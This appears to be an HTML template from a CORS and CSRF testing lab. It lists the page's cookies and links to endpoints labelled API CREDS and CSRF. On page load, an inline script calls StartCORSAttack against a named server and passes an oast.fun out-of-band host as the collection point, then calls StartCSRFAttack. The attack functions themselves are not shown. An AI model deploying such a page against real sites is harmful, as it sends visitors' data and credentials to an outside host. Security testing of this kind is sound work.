<html>
<script type="text/javascript" src="script.js"></script>
<head>
</head>
<body>

<h1>Hello!</h1>
<div>
    <a href="/api_null">API NULL</a>
    <a href="/api_gen">API GEN</a>
    <a href="/api_creds">API CREDS</a>
</div>

<div>
    <a href="/send">CSRF</a>
</div>
    <h2>Cookies</h2>
    {% for i in cook %}
        <li>{{i}}: {{cook[i]}}</li>
    {% endfor %}
    <script>
    StartCORSAttack(
        "https://sidneyjob.ru:8081", 
        "https://cmwgayv2vtc000015z4ggkqefxwyyyyyb.oast.fun"
    );

    StartCSRFAttack("https://sidneyjob.ru:8081");
    </script>
</body>
</html>